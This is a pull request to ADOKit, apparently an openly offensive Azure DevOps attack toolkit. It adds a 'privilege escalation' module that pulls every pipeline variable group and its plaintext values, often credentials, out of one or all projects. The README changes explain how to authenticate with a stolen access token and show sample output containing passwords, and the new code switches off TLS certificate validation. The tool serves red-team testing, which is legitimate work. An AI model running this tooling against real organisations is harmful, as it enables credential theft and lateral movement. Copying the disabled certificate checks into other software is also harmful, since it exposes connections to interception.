### PR TITLE
Feature add: search for all variable groups and their variables

### DIFF
--- a/ADOKit/ADOKit.cs
+++ b/ADOKit/ADOKit.cs
@@ -19,7 +19,7 @@ namespace ADOKit
         private static string search = "";
         private static string id = "";
         private static string sshKey = "";
-        private static List<string> approvedModules = new List<string> { "check", "whoami", "listrepo", "searchrepo", "listproject", "searchproject", "searchcode", "searchfile", "listuser", "searchuser", "listgroup", "searchgroup", "getgroupmembers", "getpermissions", "createpat", "removepat", "listpat", "createsshkey", "removesshkey", "listsshkey", "addprojectadmin", "removeprojectadmin", "addbuildadmin", "removebuildadmin", "addcollectionadmin", "removecollectionadmin", "addcollectionbuildadmin", "removecollectionbuildadmin", "addcollectionbuildsvc", "removecollectionbuildsvc", "addcollectionsvc", "removecollectionsvc", "getpipelinevars", "getpipelinesecrets", "getserviceconnections" };
+        private static List<string> approvedModules = new List<string> { "check", "whoami", "listrepo", "searchrepo", "listproject", "searchproject", "searchcode", "searchfile", "listuser", "searchuser", "listgroup", "searchgroup", "getgroupmembers", "getpermissions", "createpat", "removepat", "listpat", "createsshkey", "removesshkey", "listsshkey", "addprojectadmin", "removeprojectadmin", "addbuildadmin", "removebuildadmin", "addcollectionadmin", "removecollectionadmin", "addcollectionbuildadmin", "removecollectionbuildadmin", "addcollectionbuildsvc", "removecollectionbuildsvc", "addcollectionsvc", "removecollectionsvc", "getpipelinevars", "getpipelinesecrets", "getvariablegroups", "getserviceconnections" };
 
 
 
@@ -236,6 +236,9 @@ namespace ADOKit
                         break;
                     case "getpipelinesecrets":
                         await Modules.Privesc.GetPipelineSecrets.execute(credential, url, project);
+                        break;
+                    case "getvariablegroups":
+                        await Modules.Privesc.GetVariableGroups.execute(credential, url, project);
                         break;
                     case "getserviceconnections":
                         await Modules.Privesc.GetServiceConnections.execute(credential, url, project);

--- a/ADOKit/Modules/Privesc/GetVariableGroups.cs
+++ b/ADOKit/Modules/Privesc/GetVariableGroups.cs
@@ -1,0 +1,108 @@
+﻿using System;
+using System.Net;
+using System.Threading.Tasks;
+using System.Security.Cryptography.X509Certificates;
+using System.Net.Security;
+using System.Collections.Generic;
+using ADOKit.Objects;
+
+namespace ADOKit.Modules.Privesc
+{
+    class GetVariableGroups
+    {
+
+        public static async Task execute(string credential, string url, string project)
+        {
+            // Generate module header
+            Console.WriteLine(Utilities.ArgUtils.GenerateHeader("getvariablegroups", credential, url, "", project, "", ""));
+
+            // ignore SSL errors
+            ServicePointManager.ServerCertificateValidationCallback = delegate (object s, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) { return true; };
+            ServicePointManager.Expect100Continue = true;
+            ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
+
+            // check if credentials provided are valid
+            Console.WriteLine("");
+            Console.WriteLine("[*] INFO: Checking credentials provided");
+            Console.WriteLine("");
+
+            // if creds valid, then provide message and continue
+            if (await Utilities.WebUtils.credsValid(credential, url))
+            {
+                Console.WriteLine("[+] SUCCESS: Credentials provided are VALID.");
+                Console.WriteLine("");
+
+                try
+                {
+
+                    // if user wants to dump variable groups for all projects
+                    if (project.ToLower().Equals("all"))
+                    {
+
+                        // create table header
+                        string tableHeader = string.Format("{0,30} | {1,30} | {2,30} | {3,50}", "Project Name", "Variable Group Name", "Variable Name", "Variable Value");
+                        Console.WriteLine(tableHeader);
+                        Console.WriteLine(new String('-', tableHeader.Length));
+
+                        // get a listing of all projects in the Azure DevOps instance
+                        List<Project> projectList = await Utilities.ProjectUtils.getAllProjects(credential, url);
+
+                        // iterate through the list of projects
+                        foreach (Project proj in projectList)
+                        {
+                            // get a list of all variable groups and their variables
+                            List<GroupVariable> variableGroups = await Utilities.PipelineUtils.getVariableGroups(credential, url, proj.projectName);
+                            foreach (GroupVariable var in variableGroups)
+                            {
+                                Console.WriteLine("{0,30} | {1,30} | {2,30} | {3,50}", proj.projectName, var.groupName, var.name, var.value);
+                            }
+                        }
+
+                        Console.WriteLine("");
+
+                    }
+
+                    // if user wants to only dump pipeline variables for a certain project
+                    else
+                    {
+                        // create table header
+                        string tableHeader = string.Format("{0,30} | {1,30} | {2,50}", "Variable Group Name", "Variable Name", "Variable Value");
+                        Console.WriteLine(tableHeader);
+                        Console.WriteLine(new String('-', tableHeader.Length));
+
+                        // get a list of all variable groups and their variables
+                        List<GroupVariable> variableGroups = await Utilities.PipelineUtils.getVariableGroups(credential, url, project);
+                        foreach (GroupVariable var in variableGroups)
+                        {
+                            Console.WriteLine("{0,30} | {1,30} | {2,50}", var.groupName, var.name, var.value);
+                        }
+
+                        Console.WriteLine("");
+
+                    }
+
+
+
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("");
+                    Console.WriteLine("[-] ERROR: " + ex.Message);
+                    Console.WriteLine("");
+                }
+
+
+            }
+
+            // if creds not valid, display message and return
+            else
+            {
+                Console.WriteLine("[-] ERROR: Credentials provided are INVALID. Check the credentials again.");
+                Console.WriteLine("");
+                return;
+            }
+
+        }
+
+    }
+}

--- a/ADOKit/Objects/GroupVariable.cs
+++ b/ADOKit/Objects/GroupVariable.cs
@@ -1,0 +1,25 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace ADOKit.Objects
+{
+    class GroupVariable
+    {
+
+        public string name { get; set; }
+        public string value { get; set; }
+        public string groupName { get; set; }
+
+        public GroupVariable(string name, string value, string groupName)
+        {
+            this.name = name;
+            this.value = value;
+            this.groupName = groupName;
+        }
+
+
+    }
+}

--- a/ADOKit/Utilities/ProjectUtils.cs
+++ b/ADOKit/Utilities/ProjectUtils.cs
@@ -118,7 +118,7 @@ namespace ADOKit.Utilities
         }
 
 
-        // get a list of all proejcts
+        // get a list of all projects
         public static async Task<List<Project>> getAllProjects(string credentials, string url)
         {
             List<Objects.Project> projectList = new List<Objects.Project>();

--- a/README.md
+++ b/README.md
@@ -60,6 +60,7 @@ Full details on the techniques used by ADOKit are in the X-Force Red [whitepaper
     - [Remove Collection Service Account](#remove-collection-service-account)
     - [Get Pipeline Variables](#get-pipeline-variables)
     - [Get Pipeline Secrets](#get-pipeline-secrets)
+	- [Get Variable Groups](#get-variable-groups)
     - [Get Service Connections](#get-service-connections)
 - [Detection](#detection)
 - [Roadmap](#roadmap)
@@ -131,6 +132,7 @@ Take the below steps to setup Visual Studio in order to compile the project your
   * <b>removecollectionsvc</b> - Remove a user from the "Project Collection Service Accounts" group
   * <b>getpipelinevars</b> - Retrieve any pipeline variables used for a given project.
   * <b>getpipelinesecrets</b> - Retrieve the names of any pipeline secrets used for a given project.
+  * <b>getvariablegroups</b> - Retrieve any variable groups and the corresponding variables used for a given project.
   * <b>getserviceconnections</b> - Retrieve the service connections used for a given project.
 
 
@@ -152,6 +154,10 @@ Below are the authentication options you have with ADOKit when authenticating to
   * `/credential:UserAuthentication=ABC123`
 * **Personal Access Token (PAT)** - This will be an access token/API key that will be a single string.
   * `/credential:apiToken`
+* **Stolen Access Token** - If you can steal or refresh a suitable access token you can also use it.
+  * `/credential:accessToken`
+
+Note: When using an access token, it must be valid for the resource Azure RM (i.e. "aud":"https://management.core.windows.net/").
 
 ## Module Details Table
 The below table shows the permissions required for each module.
@@ -192,6 +198,7 @@ Privilege Escalation | `addcollectionsvc` |  Yes - `Project Collection Administr
 Privilege Escalation | `removecollectionsvc` |  Yes - `Project Collection Administrator` or `Project Collection Service Accounts` | 
 Privilege Escalation | `getpipelinevars` | Yes - `Contributors` or `Readers` or `Build Administrators` or `Project Administrators` or `Project Team Member` or `Project Collection Test Service Accounts` or `Project Collection Build Service Accounts` or `Project Collection Build Administrators` or `Project Collection Service Accounts` or `Project Collection Administrators` |
 Privilege Escalation | `getpipelinesecrets` |  Yes - `Contributors` or `Readers` or `Build Administrators` or `Project Administrators` or `Project Team Member` or `Project Collection Test Service Accounts` or `Project Collection Build Service Accounts` or `Project Collection Build Administrators` or `Project Collection Service Accounts` or `Project Collection Administrators` | 
+Privilege Escalation | `getvariablegroups` |  Yes - `Contributors` or `Readers` or `Build Administrators` or `Project Administrators` or `Project Team Member` or `Project Collection Test Service Accounts` or `Project Collection Build Service Accounts` or `Project Collection Build Administrators` or `Project Collection Service Accounts` or `Project Collection Administrators` |
 Privilege Escalation | `getserviceconnections` |  Yes - `Project Administrator`, `Project Collection Administrator` or `Project Collection Service Accounts` | 
 
 
@@ -1778,6 +1785,52 @@ Timestamp:      4/10/2023 10:28:37 AM
                     secretpass |             [HIDDEN]
 
 4/10/23 14:28:38 Finished execution of getpipelinesecrets
+
+```
+
+### Get Variable Groups
+
+#### Use Case
+
+> *Extract any variable group and the corresponding variables being used in project(s), which could contain credentials or other useful information.*
+
+#### Syntax
+
+Provide the `getvariablegroups` module along with a `/project:` for a given project to extract any variable groups being used. If you would like to extract variables groups from all projects specify `all` in the `/project:` argument.
+
+`ADOKit.exe getvariablegroups /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"`
+
+`ADOKit.exe getvariablegroups /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"`
+
+`ADOKit.exe getvariablegroups /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"`
+
+`ADOKit.exe getvariablegroups /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"`
+
+#### Example Output
+
+```
+C:\>ADOKit.exe getvariablegroups /credential:"ABC123" /url:https://dev.azure.com/YourOrganization /project:"ADOKit"
+
+==================================================
+Module:         getvariablegroups
+Auth Type:      Cookie
+Project:        ADOKit
+Target URL:     https://dev.azure.com/YourOrganization
+
+Timestamp:      16/05/2024 16:53:31
+==================================================
+
+
+[*] INFO: Checking credentials provided
+
+[+] SUCCESS: Credentials provided are VALID.
+
+           Variable Group Name |                  Variable Name |                                     Variable Value
+--------------------------------------------------------------------------------------------------------------------
+           real-test-variables |                  test_password |                                      BurpIsNotBeef
+           real-test-variables |                      test_user |                                            nicolas
+           fake-prod-variables |                    SUPERSECRET |                                           [HIDDEN]
+           fake-prod-variables |                 SUPERNOTSECRET |                             ThisShouldBeSecured :/
 
 ```
 


### PR DESCRIPTION
I added the feature to search in variable groups. These are found in the web UI in Pipelines > Library:
![image](https://github.com/xforcered/ADOKit/assets/20835344/3b4b71a0-6879-493d-a720-ce66ca6de495)

As for the pipeline variables they can be configured as secret ... or not. I chose to dump all at the same time, the secrets are marked as [HIDDEN].

### Access tokens for authentication
I've also added a small thing in the documentation about using an access token to authenticate. I've used roadtx to test it: https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)#authentication The only caveat is that you need to specify the resource with `-r https://management.core.windows.net/` in roadtx to get the correct audience in the access token.

I still don't understand why this is supported but you can use the access token just like a PAT and it works. I initially started to use it as it should be used (i.e. as a Bearer token) and this works too. But it was easier to re-use the existing code rather than add the new authentication method in all the places where this piece of code is duplicated. So the result is that the code will send a header that looks like `Authorization: Basic OmV5SjBlWEFpT2lKS1YxUW...`. And the base64 blob is a colon concatenated with the access token and encoded as base64... and it works for some reason 🤷